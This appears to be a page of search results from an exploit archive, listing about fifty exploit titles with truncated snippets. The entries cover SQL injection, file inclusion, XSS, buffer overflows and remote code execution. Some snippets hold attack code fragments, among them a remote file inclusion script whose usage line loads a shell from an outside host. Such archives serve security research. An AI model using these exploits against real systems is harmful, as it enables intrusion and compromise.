41207 matches found
DUdownload 1.01.1 - detail.asp Multiple SQL Injections
DUdownload 1.01.1 - detail.asp Multiple SQL Injections source: https://www.securityfocus.com/bid/21405/info Multiple DuWare products are prone to multiple SQL-injection vulnerabilities because they fail to properly sanitize user-supplied input before using it in SQL queries. A successful exploit...
phpBB Spider Friendly Module 1.3.10 - Remote File Inclusion
phpBB Spider Friendly Module 1.3.10 - Remote File Inclusion !/usr/bin/php -q -d shortopentag=on | | \\ | | | | | | \ //----------------------- | DEVIL TEAM - POLISH TEAM \/ http://www.rahim.webd.pl/ . .\ . \ / | | ||/ | || / \ | \ / /\ | | / | \ \ | |/ \ / \ | \ | || | | | | \ | / //\ |...
PBLang 4.66z - temppath Remote File Inclusion
PBLang 4.66z - temppath Remote File Inclusion ============================================================================================== Software PBLang = v4.66z temppath Remote File Inclusion Exploit...
Vivvo Article Manager 3.2 - classified_path File Inclusion
Vivvo Article Manager 3.2 - classifiedpath File Inclusion MercilessTurk [email protected] App Name: phpWordPress Vivvo Article Manager App Author: vivvo.net App Version: =3.2 Vulnerable Code in HTMLfunction.php function HTMLCategoryMenu : line 51:...
Mambo Component User Home Pages 0.5 - Remote File Inclusion
Mambo Component User Home Pages 0.5 - Remote File Inclusion Kurdish Security Freedom For Ocalan Contact : irc.gigachat.net kurdhack & www.PatrioticHackers.com Rish : High Class : Remote Script : User Home Pges Site : www.ravensportal.co.uk Thanx :...
iManage CMS 4.0.12 - absolute_path Remote File Inclusion
iManage CMS 4.0.12 - absolutepath Remote File Inclusion \ /\ \ / | \ \ | / \ // / | \ | \ \ Y / | \ / / \ /| /\ / / / / / .OR.ID ECHOADV40$2006 --------------------------------------------------------------------------------------------------- ECHOADV40$2006 iManage CMS = 4.0.12...
RARLAB WinRAR 3.x - LHA Filename Handling Buffer Overflow
RARLAB WinRAR 3.x - LHA Filename Handling Buffer Overflow // source: https://www.securityfocus.com/bid/19043/info WinRAR is susceptible to a remote buffer-overflow vulnerability because it fails to properly bounds-check user-supplied input before copying it to an insufficiently sized memory buffe...
FlashBB 1.1.8 - phpbb_root_path Remote File Inclusion
FlashBB 1.1.8 - phpbbrootpath Remote File Inclusion !/usr/bin/perl TUFaT FlashBB perl flashBB.pl http://target.com/flashbb http://site.com/cmd.txt cmd cmd shell example: cmd shell variable: $GETcmd; Contact: h4ntu [email protected] use LWP::UserAgent; $Path = $ARGV0; $Pathtocmd = $ARGV1;...
acFTP FTP Server 1.4 - USER Remote Denial of Service
acFTP FTP Server 1.4 - USER Remote Denial of Service / Exploit for : acFTP 1.4 DoS Exploit Advisory : http://secunia.com/advisories/19978/ Coder : Omnipresent Email : [email protected] Description : Preddy has discovered a vulnerability in acFTP, which can be exploited by malicious people to...
Web Host Automation Ltd. Helm 3.2.10 Beta - default.asp Multiple Cross-Site Scripting Vulnerabilities
Web Host Automation Ltd. Helm 3.2.10 Beta - default.asp Multiple Cross-Site Scripting Vulnerabilities source: https://www.securityfocus.com/bid/17263/info Helm is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize...
Web Host Automation Ltd. Helm 3.2.8 - ForgotPassword.asp Cross-Site Scripting
Web Host Automation Ltd. Helm 3.2.8 - ForgotPassword.asp Cross-Site Scripting source: https://www.securityfocus.com/bid/16234/info Helm is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. An attacker may...
PHPBook 1.x - Mail Field PHP Code Injection
PHPBook 1.x - Mail Field PHP Code Injection source: https://www.securityfocus.com/bid/16106/info phpBook is prone to a vulnerability that may let remote attackers inject arbitrary PHP code into the application. This code may then be executed by visiting pages that include the injected code. E-mai...
Multiple Vendor BIOS - Keyboard Buffer Password Persistence (2)
Multiple Vendor BIOS - Keyboard Buffer Password Persistence 2 // source: https://www.securityfocus.com/bid/15751/info Multiple vendors fail to clear the BIOS Basic Input-Output System keyboard buffer after reading the preboot authentication password during the system startup process. Depending on...
Mozilla Browsers - 0xAD (HOST:) Remote Heap Buffer Overrun (2)
Mozilla Browsers - 0xAD HOST: Remote Heap Buffer Overrun 2 / SSSSSSS, SSSSSSS' PwnZilla 5 - One sploit fits all. FireFox optimized iSY iS; .sS Exploit for IDN host name heap buffer overrun in .SSSSSSS .sS Mozilla browsers FireFox, Mozilla and Netscape iS; .sS Copyright C 2003-2005 by Berend-Jan...
DameWare Mini Remote Control 4.0 4.9 - Client Agent Remote Overflow
DameWare Mini Remote Control 4.0 4.9 - Client Agent Remote Overflow / / / / / / / / \ / / // / / / / // // / / / .// //// ///====================== DameWare Mini Remote Control Client Agent Service Another Pre-Authentication Buffer Overflow By Jackson Pollocks No5 www.jpno5.com Summary...
gld 1.4 - Postfix Greylisting Daemon Remote Format String
gld 1.4 - Postfix Greylisting Daemon Remote Format String / 0x82-meOw-linuxerforever - gld 1.4 remote overflow format string exploit. c 2005 Team INetCop Security. Nickname of this code is, Kill two bird with one stone.' or, One shot, two kill!.' hehehe ;-D Advisory URL:...
WebHost Automation Helm Control Panel 3.1.x - Multiple Input Validation Vulnerabilities
WebHost Automation Helm Control Panel 3.1.x - Multiple Input Validation Vulnerabilities source: https://www.securityfocus.com/bid/11586/info Helm Control Panel is reported prone to multiple vulnerabilities. These include an SQL injection issue and an HTML injection vulnerability. A remote attacke...
Master of Orion III 1.2.5 - Denial of Service
Master of Orion III 1.2.5 - Denial of Service / by Luigi Auriemma / include include include ifdef WIN32 include / Header file used for manage errors in Windows It support socket and errno too this header replace the previous sockerrX.h / include include void stderrvoid char error;...
Monit 4.2 - Remote Buffer Overflow
Monit 4.2 - Remote Buffer Overflow / THE EYE ON SECURITY RESEARCH GROUP - INDIA www eos-india net poc 305monit.c Remote Root Exploit for Monit include include include include define BUFFSIZE 2048 define PADDING 40 define EXPSIZE 256+4+PADDING define MAXARCH 2 struct eos char arch; unsigned long...
PhotoPost 4.6 - Multiple Vulnerabilities
PhotoPost 4.6 - Multiple Vulnerabilities PhotoPost Multiple Vulnerabilities Vendor: All Enthusiast, Inc Product: PhotoPost Version: = 4.6 Website: http://www.photopost.com/ BID: 9994 CVE: CVE-2004-1870 CVE-2004-1871 OSVDB: 10261 10262 10263 10264 10265 10266 10267 4771 SECUNIA: 11241 Description:...
NETObserve 2.0 - Authentication Bypass
NETObserve 2.0 - Authentication Bypass source: https://www.securityfocus.com/bid/9319/info NETObserve is prone to a vulnerability that may permit remote unauthenticated users to access functions of the software. Due to the nature of the software, this could permit an attacker to execute commands...
Aardvark Topsites 4.1.0 - Multiple Vulnerabilities
Aardvark Topsites 4.1.0 - Multiple Vulnerabilities Aardvark Topsites Multiple Vulnerabilities Vendor: Aardvark Industries Product: Aardvark Topsites Version: = 4.1.0 Website: http://www.aardvarkind.com/ BID: 9231 Description: Aardvark Topsites is a popular free PHP topsites script. See URL for...
Epic 1.0.11.0.x - CTCP Nickname Server Message Buffer Overrun
Epic 1.0.11.0.x - CTCP Nickname Server Message Buffer Overrun // source: https://www.securityfocus.com/bid/8999/info A remotely exploitable buffer overrun has been reported in Epic. This issue may reportedly be exploited by a malicious server that supplies an overly long nickname in a CTCP...
Critical Path InJoin Directory Server 4.0 - File Disclosure
Critical Path InJoin Directory Server 4.0 - File Disclosure source: https://www.securityfocus.com/bid/4718/info Critical Path provides an LDAP Lightweight Directory Access Protocol Directory Server called InJoin. InJoin Directory Server is provided for Microsoft Windows operating systems and Unix...
Microsoft Index Server 2.0 - File Information Full Path Disclosure
Microsoft Index Server 2.0 - File Information Full Path Disclosure source: https://www.securityfocus.com/bid/3339/info The sqlqhit.asp sample file is used for performing web-based SQL queries. Malicious users could send specifically crafted HTTP request to an Internet Information Services server...
DCForum 6.0 - Remote Admin Privilege Arbitrary Commands
DCForum 6.0 - Remote Admin Privilege Arbitrary Commands source: https://www.securityfocus.com/bid/2728/info DCForum is a commercial cgi script from DCScripts which is designed to facilitate web-based threaded discussion forums. Versions of DCForum are vulnerable to attacks which can yield an...
Microsoft Windows Server 2000 SP1SP2 - isapi .printer Extension Overflow (1)
Microsoft Windows Server 2000 SP1SP2 - isapi .printer Extension Overflow 1 / iishack 2000 - eEye Digital Security - 2001 This affects all unpatched windows 2000 machines with the .printer isapi filter loaded. This is purely proof of concept. Quick rundown of the exploit: Eip overruns at position...
keware technologies homeseer 1.4 - Directory Traversal
keware technologies homeseer 1.4 - Directory Traversal source: https://www.securityfocus.com/bid/2085/info Keware Technologies HomeSeer is a home automation application which enables users to control various housewares and appliances locally or remotely via a web interface. It is possible for a...
Cisco Catalyst 4000 4.x5.x Catalyst 5000 4.55.x Catalyst 6000 5.x - Memory Leak Denial of Service
Cisco Catalyst 4000 4.x5.x Catalyst 5000 4.55.x Catalyst 6000 5.x - Memory Leak Denial of Service source: https://www.securityfocus.com/bid/2072/info Cisco Catalyst is a high speed switch implemented in local area networks. The telnet server that is built into the Catalyst firmware for remote...
RobTex Viking Server 1.0.6 Build 355 - Remote Buffer Overflow
RobTex Viking Server 1.0.6 Build 355 - Remote Buffer Overflow // source: https://www.securityfocus.com/bid/1614/info A number of unchecked buffers exists in Robotex Viking Server. This enables a malicious user to either crash the application or execute arbitrary code, depending on the data...
Trend Micro OfficeScan Corporate Edition 3.03.53.113.13 - Denial of Service
Trend Micro OfficeScan Corporate Edition 3.03.53.113.13 - Denial of Service source: https://www.securityfocus.com/bid/1013/info Trend Micro OfficeScan is an antivirus software program which is deployable across an entire network. During the installation of the management software, the administrat...
BSDOS 3.14.0.1 FreeBSD 3.03.13.2 RedHat Linux 6.0 - amd Remote Buffer Overflow (2)
BSDOS 3.14.0.1 FreeBSD 3.03.13.2 RedHat Linux 6.0 - amd Remote Buffer Overflow 2 // source: https://www.securityfocus.com/bid/614/info There is a remotely exploitable buffer overflow condition in the amd daemon under several operating systems. Amd is a daemon that automatically mounts filesystems...
Compaq Client Management Agents 3.704.0 Insight Management Agents 4.21 A4.22 A4.30 A Intelligent Cluster Administrator 1.0 Management Agents for Workstations 4.20 A Server Management Agents 4.23 Survey Utility 2.0 - Web File Access
Compaq Client Management Agents 3.704.0 Insight Management Agents 4.21 A4.22 A4.30 A Intelligent Cluster Administrator 1.0 Management Agents for Workstations 4.20 A Server Management Agents 4.23 Survey Utility 2.0 - Web File Access source: https://www.securityfocus.com/bid/282/info A vulnerabilit...
HP-UX 10.20 newgrp - Local Privilege Escalation
HP-UX 10.20 newgrp - Local Privilege Escalation source: https://www.securityfocus.com/bid/683/info Due to insufficient bounds checking on user supplied arguments, it is possible to overflow an internal buffer and execute arbitrary code as root. !/usr/bin/perl use FileHandle; sub h2cs local$stuff=...
phpMyChat Plus 1.98 - pmc_username SQL Injection
phpMyChat Plus 1.98 - pmcusername SQL Injection Title: phpMyChat Plus 1.98 - 'pmcusername' SQL Injection Date: 2020-02-13 Exploit Author: J3rryBl4nks Vendor Homepage: http://ciprianmp.com/latest/ Software Link: https://sourceforge.net/projects/phpmychat/files/phpMyChatPlus/ Version MyChat Plus 1....
XMLBlueprint 16.191112 - XML External Entity Injection
XMLBlueprint 16.191112 - XML External Entity Injection Exploit Title: XMLBlueprint 16.191112 - XML External Entity Injection Exploit Author: Javier Olmedo Date: 2018-11-14 Vendor: XMLBlueprint XML Editor Software Link: https://www.xmlblueprint.com/update/download-64bit.exe Affected Version:...
Hospital Management System 4.0 - Persistent Cross-Site Scripting
Hospital Management System 4.0 - Persistent Cross-Site Scripting Exploit Title: Hospital Management System 4.0 - Persistent Cross-Site Scripting Google Dork: N/A Date: 2020-01-02 Exploit Author: FULLSHADE Vendor Homepage: https://phpgurukul.com/ Software Link:...
SpotAuditor 5.3.2 - Base64 Local Buffer Overflow (SEH)
SpotAuditor 5.3.2 - Base64 Local Buffer Overflow SEH Exploit Title: SpotAuditor 5.3.2 - 'Base64' Local Buffer Overflow SEH Exploit Author: Kirill Nikolaev Date: 2019-12-06 Vulnerable Software: SpotAuditor Vendor Homepage: http://www.nsauditor.com/ Version: 5.3.2 Software Link:...
Ajenti 2.1.31 - Remote Code Exection (Metasploit)
Ajenti 2.1.31 - Remote Code Exection Metasploit Exploit Title: Ajenti 2.1.31 - Remote Code Exection Metasploit Date: 2019-10-29 Exploit Author: Onur ER Vendor Homepage: http://ajenti.org/ Software Link: https://github.com/ajenti/ajenti Version: 2.1.31 Tested on: Ubuntu 19.10 This module requires...
Joomla! 3.4.6 - Remote Code Execution (Metasploit)
Joomla! 3.4.6 - Remote Code Execution Metasploit Exploit Title: Joomla! 3.4.6 - Remote Code Execution Metasploit Google Dork: N/A Date: 2019-10-02 Exploit Author: Alessandro Groppo Vendor Homepage: https//www.joomla.it/ Software Link: https://downloads.joomla.org/it/cms/joomla3/3-4-6 Version: 3.0...
Ajenti 2.1.31 - Remote Code Execution
Ajenti 2.1.31 - Remote Code Execution Title: Ajenti 2.1.31 - Remote Code Execution Author: Jeremy Brown Date: 2019-10-13 Software Link: https://github.com/ajenti/ajenti CVE: N/A Tested on: Ubuntu Linux !/usr/bin/python ajentix.py Ajenti Remote Command Execution Exploit ------- Details -------...
ASX to MP3 converter 3.1.3.7 - .asx Local Stack Overflow (DEP)
ASX to MP3 converter 3.1.3.7 - .asx Local Stack Overflow DEP Exploit Title: ASX to MP3 converter 3.1.3.7 - '.asx' Local Stack Overflow DEP Google Dork: N/A Date: 2019-10-06 Exploit Author: max7253 Vendor Homepage: http://www.mini-stream.net/ Software Link:...
PHP 7.0 7.3 (Unix) - gc disable_functions Bypass
PHP 7.0 7.3 Unix - gc disablefunctions Bypass = 0; $j-- $address = 8; return $out; function write&$str, $p, $v, $n = 8 $i = 0; for$i = 0; $i = 8; function leak$addr, $p = 0, $s = 8 global $abc, $helper; write$abc, 0x68, $addr + $p - 0x10; $leak = strlen$helper-a; if$s != 8 $leak %= 2 $s 8 - 1;...
iMessage - Decoding NSSharedKeyDictionary Can Read Object Out of Bounds
iMessage - Decoding NSSharedKeyDictionary Can Read Object Out of Bounds When an NSKeyedUnarchiver decodes an object, it first allocates the object using allocWithZone, and then puts the object into a dictionary for temporary objects. It then calls the appropriate initWithCoder: on the allocated...
Microsoft Font Subsetting - DLL Heap Corruption in FixSbitSubTables
Microsoft Font Subsetting - DLL Heap Corruption in FixSbitSubTables -----===== Background =====----- The Microsoft Font Subsetting DLL fontsub.dll is a default Windows helper library for subsetting TTF fonts; i.e. converting fonts to their more compact versions based on the specific glyphs used i...
Windows PowerShell - Unsanitized Filename Command Execution
Windows PowerShell - Unsanitized Filename Command Execution ''' + Credits: John Page aka hyp3rlinx + Website: hyp3rlinx.altervista.org + Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-POWERSHELL-UNSANITIZED-FILENAME-COMMAND-EXECUTION.txt + ISR: Apparition Security Vendor...
Ahsay Backup 7.x - 8.1.1.50 - Authenticated Arbitrary File Upload Remote Code Execution
Ahsay Backup 7.x - 8.1.1.50 - Authenticated Arbitrary File Upload Remote Code Execution Exploit Title: Authenticated insecure file upload and code execution flaw in Ahsay Backup v7.x - v8.1.1.50. POC Date: 26-6-2019 Exploit Author: Wietse Boonstra Vendor Homepage: https://ahsay.com Software Link:...
CentOS Control Web Panel 0.9.8.836 - Authentication Bypass
CentOS Control Web Panel 0.9.8.836 - Authentication Bypass Exploit Title: CWP CentOS Control Web Panel ||//...
WordPress Plugin iLive 1.0.4 - Cross-Site Scripting
WordPress Plugin iLive 1.0.4 - Cross-Site Scripting Exploit Title: iLive - Intelligent WordPress Live Chat Support Plugin v1.0.4 Stored XSS Injection Google Dork: - Date: 2019/06/25 Exploit Author: m0ze Vendor Homepage: http://www.ilive.wpapplab.com/ Software Link:...
Linux - Use-After-Free via race Between modify_ldt() and #BR Exception
Linux - Use-After-Free via race Between modifyldt and BR Exception / When a BR exception is raised because of an MPX bounds violation, Linux parses the faulting instruction and computes the linear address of its memory operand. If the userspace instruction is in 32-bit code, this involves looking...